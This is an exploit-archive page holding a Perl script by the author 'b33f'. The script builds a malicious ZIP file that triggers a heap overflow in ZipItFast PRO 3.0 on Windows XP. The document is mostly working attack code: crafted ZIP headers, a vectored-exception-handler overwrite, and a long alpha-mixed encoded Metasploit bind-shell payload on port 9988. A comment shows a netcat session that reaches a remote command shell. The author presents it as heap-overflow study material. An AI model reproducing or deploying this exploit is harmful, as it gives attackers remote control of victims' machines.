Home / exploits ZipItFast PRO 3.0 Heap Overflow
Posted on 13 July 2012
#!/usr/bin/perl #---------------------------------------------------------------------------# # Exploit: ZipItFast PRO v3.0 Heap-Overflow # # Author: b33f - http://www.fuzzysecurity.com/ # # OS: Windows XP SP1 # # DOS POC: C4SS!0 G0M3S => http://www.exploit-db.com/exploits/17512/ # # Software: http://www.exploit-db.com/wp-content/themes/exploit/ # # applications/decbc54ffcf644e780a3ef4fcdd27093-zipitfastnow.exe # #---------------------------------------------------------------------------# # Sorry for reinventing the wheel but learning about heap-overflows # # requires you to take a step back and roll with the punches not unlike # # watching a David Lynch production ;))... # # # # - "Who is that lady with the log?" # # + "We call her the log-lady.." # #---------------------------------------------------------------------------# # root@bt:~# nc -nv 192.168.111.131 9988 # # (UNKNOWN) [192.168.111.131] 9988 (?) open # # Microsoft Windows XP [Version 5.1.2600] # # (C) Copyright 1985-2001 Microsoft Corp. # # # # C:Documents and SettingsOwnerDesktop> # #---------------------------------------------------------------------------# use strict; use warnings; my $filename = "Exploit.zip"; my $head = "x50x4Bx03x04x14x00x00". "x00x00x00xB7xACxCEx34x00x00x00". "x00x00x00x00x00x00x00x00". "xe4x0f". "x00x00x00"; my $head2 = "x50x4Bx01x02x14x00x14". "x00x00x00x00x00xB7xACxCEx34x00x00x00". "x00x00x00x00x00x00x00x00x00". "xe4x0f". "x00x00x00x00x00x00x01x00". "x24x00x00x00x00x00x00x00"; my $head3 = "x50x4Bx05x06x00x00x00". "x00x01x00x01x00". "x12x10x00x00". "x02x10x00x00". "x00x00"; # msfpayload windows/shell_bind_tcp LPORT=9988 R| msfencode -e x86/alpha_mixed -t # [*] x86/alpha_mixed succeeded with size 744 (iteration=1) my $ph33r = "x89xe2xdaxd5xd9x72xf4x58x50x59x49x49x49x49" . "x49x49x49x49x49x49x43x43x43x43x43x43x37x51" . "x5ax6ax41x58x50x30x41x30x41x6bx41x41x51x32" . "x41x42x32x42x42x30x42x42x41x42x58x50x38x41" . "x42x75x4ax49x39x6cx39x78x4cx49x55x50x47x70" . "x55x50x35x30x6fx79x59x75x54x71x78x52x52x44" . "x6ex6bx42x72x44x70x6ex6bx30x52x56x6cx4ex6b" . "x30x52x35x44x4ex6bx52x52x77x58x56x6fx68x37" . "x61x5ax46x46x64x71x79x6fx74x71x6fx30x6cx6c" . "x75x6cx65x31x33x4cx56x62x34x6cx31x30x6fx31" . "x4ax6fx64x4dx73x31x6ax67x6dx32x4cx30x70x52" . "x56x37x4ex6bx50x52x76x70x6cx4bx61x52x77x4c" . "x73x31x6ax70x4cx4bx37x30x52x58x6fx75x79x50" . "x72x54x73x7ax45x51x4ax70x42x70x4cx4bx32x68" . "x65x48x6cx4bx63x68x65x70x76x61x39x43x6bx53" . "x65x6cx77x39x4ex6bx76x54x4cx4bx76x61x48x56" . "x76x51x49x6fx55x61x79x50x6ex4cx6fx31x58x4f" . "x56x6dx45x51x38x47x66x58x69x70x42x55x6ax54" . "x74x43x53x4dx5ax58x77x4bx73x4dx64x64x33x45" . "x48x62x73x68x6ex6bx61x48x76x44x76x61x6ax73" . "x50x66x6ex6bx46x6cx62x6bx6cx4bx36x38x35x4c" . "x56x61x4bx63x6cx4bx43x34x6ex6bx33x31x7ax70" . "x6ex69x62x64x34x64x56x44x33x6bx63x6bx50x61" . "x31x49x73x6ax72x71x79x6fx59x70x32x78x33x6f" . "x32x7ax4ex6bx56x72x68x6bx6bx36x43x6dx71x78" . "x47x43x55x62x47x70x67x70x71x78x53x47x42x53" . "x50x32x31x4fx46x34x53x58x70x4cx30x77x76x46" . "x47x77x6bx4fx38x55x6fx48x6ex70x37x71x77x70" . "x77x70x65x79x6fx34x42x74x76x30x75x38x46x49" . "x6bx30x30x6bx53x30x79x6fx4ex35x30x50x62x70" . "x62x70x52x70x33x70x42x70x51x50x42x70x72x48" . "x68x6ax74x4fx39x4fx79x70x69x6fx4ex35x6ex69" . "x6fx37x34x71x4bx6bx76x33x63x58x66x62x65x50" . "x35x77x55x54x6ex69x4ax46x51x7ax56x70x33x66" . "x66x37x51x78x6fx32x39x4bx77x47x55x37x6bx4f" . "x4bx65x66x33x31x47x50x68x4dx67x48x69x75x68" . "x4bx4fx49x6fx4ex35x32x73x62x73x62x77x32x48" . "x43x44x68x6cx45x6bx6dx31x6bx4fx4ex35x42x77" . "x6fx79x78x47x52x48x62x55x70x6ex30x4dx75x31" . "x6bx4fx59x45x53x58x50x63x62x4dx32x44x73x30" . "x4fx79x79x73x63x67x56x37x73x67x35x61x39x66" . "x51x7ax66x72x36x39x61x46x58x62x6bx4dx63x56" . "x39x57x70x44x34x64x37x4cx53x31x57x71x4ex6d" . "x70x44x66x44x74x50x7ax66x75x50x42x64x62x74" . "x36x30x71x46x42x76x30x56x72x66x30x56x30x4e" . "x70x56x76x36x73x63x53x66x33x58x72x59x38x4c" . "x47x4fx4cx46x59x6fx4ax75x6fx79x59x70x50x4e" . "x53x66x71x56x59x6fx56x50x75x38x34x48x6fx77" . "x37x6dx63x50x59x6fx79x45x4fx4bx48x70x6cx75" . "x4cx62x31x46x45x38x6fx56x5ax35x4dx6dx6fx6d" . "x79x6fx5ax75x55x6cx37x76x53x4cx45x5ax4fx70" . "x79x6bx4dx30x43x45x73x35x4dx6bx63x77x77x63" . "x70x72x50x6fx70x6ax77x70x61x43x59x6fx79x45" . "x41x41"; my $buf1 = "A" x 4064 . ".txt"; ################# # EAX => 256-bytes => 0x77fc3210 - 0x04 => 0x77fc320c (_VECTORED_EXCEPTION_NODE) # EDX => 260-bytes => 0x0012FA28 - 0x08 => 0x0012FA20 (PTR shellcode) # Jump over Blink and Flink => EB 0A ################# my $magic = "xEBx0A" . "x0Cx32xFCx77" . "x20xFAx12x00"; ################## # Notice that the offsets don't correspond exactly. I experienced some buffer # expansion and compression depending on the buffer structure so keep that in # mind if you want to do some testing. # # Remember to set Anti-Debugging flags in your debugger.. # (immunity = > !hidedebug All_Debug) ################## my $buf2 = "x90" x 253 . $magic . "A" x 300 . $ph33r . "A" x 2756 . ".txt"; my $zip = $head.$buf1.$head2.$buf2.$head3; open(FILE,">$filename") || die "[-]Error: $! "; print FILE $zip; close(FILE);
